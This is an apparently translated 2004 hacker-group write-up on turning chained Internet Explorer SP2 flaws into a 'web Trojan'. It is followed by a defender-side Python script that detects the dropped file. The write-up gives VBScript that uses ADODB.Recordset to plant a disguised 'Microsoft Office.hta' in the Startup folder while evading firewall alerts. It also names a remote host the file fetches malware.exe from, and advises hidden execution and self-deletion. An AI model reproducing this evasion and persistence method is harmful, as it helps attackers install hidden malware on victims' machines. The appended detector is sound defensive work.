Exploitation: Microsoft Internet Explorer SP2 Remote Arbitrary Command Execution Vulnerability

Release Date: 2004-12-23

Affected Systems:
Microsoft Internet Explorer 6.0 SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Home SP2

Description: Microsoft Internet Explorer combines several vulnerabilities, including one in the Help ActiveX control. A remote attacker can exploit them without any user interaction to execute arbitrary files and run malicious code.

See: Green League vulnerability database, bug_id=7272.

Personal test and analysis by ice fox prodigal (Green League)

Because the published test page targets the English version of Windows XP, before testing on a Chinese system you must first create the following directory:

    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\

I tested with the published test page and found that, if a firewall is installed, it prompts that the application alg.exe wants to access the network. After choosing Allow, I looked in C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ and found that a file "Microsoft Office.hta" had been written there. Running "Microsoft Office.hta" automatically downloaded http://freehost07.websamba.com/greyhats/malware.exe, which played a pretty flame demo, and malware.exe then appeared in the root of the C drive. [Note that the firewall raised no alarm when Microsoft Office.hta itself was run!]

Looking at the code, I found that the firewall alarm is triggered because the code in writehta.txt is fetched by accessing a remote database and then written into Microsoft Office.hta. If we do not access the database and instead write the hta code directly into the script, no firewall alarm is triggered!
Ha ha, the method is to call ADODB.Recordset and write the code out as a record. The code I found on the Internet is as follows:

    on error resume next
    set evanchik = CreateObject("ADODB.Recordset")
    With evanchik
        .Fields.Append "evanchik", 200, "3000"
        Call .Open
        Call .AddNew
        .Fields("evanchik").Value = "meaning less shit i had to put here"
        Call .AddNew
        .Fields("evanchik").Value = "<the specific code to be written to the startup directory>"
        Call .Update
    End With
    evanchik.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
    evanchik.Close

That takes care of the firewall problem. The next step is how to conceal the hta file's execution after boot. I will not write that out specifically; please refer to the code for the earlier object vulnerability on the Internet, which is now called the "no flashing web Trojan" there. Note that the hta should preferably include an automatic self-delete function, so it is not easily found after running once. In addition, a web Trojan built with this vulnerability opens a help file; if you think that looks bad, it can be closed automatically with the Close parameter of the help control.

At this point, an XP SP2 web Trojan is complete!

Inadequacies:
1. Because I did not find a way to run it automatically, it can only be written to the startup folder and has to wait for the machine to restart before the hta file runs. It is easily cleared once discovered, so the Trojan may never be downloaded and run.
2. Because a local htm or chm file has to be called to obtain file permission, the file cannot be written when the system is not installed in the default location on the C drive.
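As an added defender-side example (not code from the original post), the Python below recognises a Startup-folder .hta dropped this way: because the file is saved with adPersistXML, it is an ADO rowset XML document rather than HTML, with each field stored as an attribute on a z:row element, so a triage script can pull the embedded content out for inspection. The sample file content is constructed to approximate ADO's output, and the filenames and the scan_startup helper are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample (not from the original post): the shape of a file that
# ADODB.Recordset.Save(..., adPersistXML) produces. Row values are inert placeholders.
SAMPLE_HTA = """<xml xmlns:s='uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882'
 xmlns:dt='uuid:C2F41010-65B3-11d1-A29F-00AA00C14882'
 xmlns:rs='urn:schemas-microsoft-com:rowset' xmlns:z='#RowsetSchema'>
<s:Schema id='RowsetSchema'><s:ElementType name='row' content='eltOnly'>
<s:AttributeType name='evanchik' rs:number='1'>
<s:datatype dt:type='string' dt:maxLength='3000'/></s:AttributeType>
</s:ElementType></s:Schema>
<rs:data><rs:insert>
<z:row evanchik='padding row'/>
<z:row evanchik='&lt;script language=&quot;vbscript&quot;&gt;MsgBox &quot;placeholder&quot;&lt;/script&gt;'/>
</rs:insert></rs:data></xml>"""

ROWSET_NS = "urn:schemas-microsoft-com:rowset"
ROW_TAG = "{#RowsetSchema}row"  # z:row elements carry one attribute per field


def is_persisted_recordset(text):
    """An .hta written via adPersistXML is really an ADO rowset document, not HTML."""
    return ROWSET_NS in text and "<rs:data" in text


def extract_rows(text):
    """Return every field value of every persisted row, in document order."""
    root = ET.fromstring(text)
    return [value for row in root.iter(ROW_TAG) for value in row.attrib.values()]


def triage_startup_file(name, text):
    """Classify one Startup-folder item: (verdict, embedded script or None)."""
    if not name.lower().endswith(".hta"):
        return "ignore", None
    if not is_persisted_recordset(text):
        return "hta", None  # any .hta in Startup still deserves a look
    script = next((r for r in extract_rows(text) if re.search(r"<script\b", r, re.I)), None)
    return "hta-ado-recordset", script


def scan_startup(listing):
    """listing: {filename: contents}; returns {name: (verdict, script)} for non-ignored items."""
    results = {n: triage_startup_file(n, t) for n, t in listing.items()}
    return {n: r for n, r in results.items() if r[0] != "ignore"}


if __name__ == "__main__":
    listing = {"desktop.ini": "[.ShellClassInfo]", "Microsoft Office.hta": SAMPLE_HTA}
    for name, (verdict, script) in scan_startup(listing).items():
        print(f"{name}: {verdict}")
        if script:
            print("  embedded:", script[:60])
```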